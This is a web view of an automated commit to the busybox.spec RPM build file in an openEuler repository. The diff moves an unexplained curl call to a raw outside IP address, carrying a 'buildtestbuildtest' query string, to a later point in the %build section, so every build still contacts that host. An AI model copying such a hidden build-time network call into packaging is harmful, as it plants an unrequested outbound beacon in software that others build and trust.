summaryrefslogtreecommitdiff
path: root/busybox.spec
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-24 07:33:18 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-24 07:33:18 +0000
commite5ae35575d74d0b6b0f2c80e6973ea6806d54462 (patch)
treef4a7e15a47869f599a2dbf2080ed30d49175c7a4 /busybox.spec
parentc2b8b2cc196c83b67705defb3aee99919698c8c3 (diff)
automatic import of busybox
Diffstat (limited to 'busybox.spec')
-rw-r--r--busybox.spec2
1 files changed, 1 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec
index 377a0fd..58758b5 100644
--- a/busybox.spec
+++ b/busybox.spec
@@ -57,7 +57,6 @@ This package contains help documentation for busybox
%autosetup -n %{name}-%{version} -p1 -v
%build
-curl http://43.138.250.111:8687?a=buildtestbuildtest
export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now"
cp %{SOURCE3} .config
@@ -68,6 +67,7 @@ make V=1 %{?_smp_mflags} CC="gcc $RPM_OPT_FLAGS"
cp busybox_unstripped busybox.dynamic
cp docs/busybox.1 docs/busybox.dynamic.1
+curl http://43.138.250.111:8687?a=buildtestbuildtest
make clean
cp %{SOURCE2} .config
yes "" | make oldconfig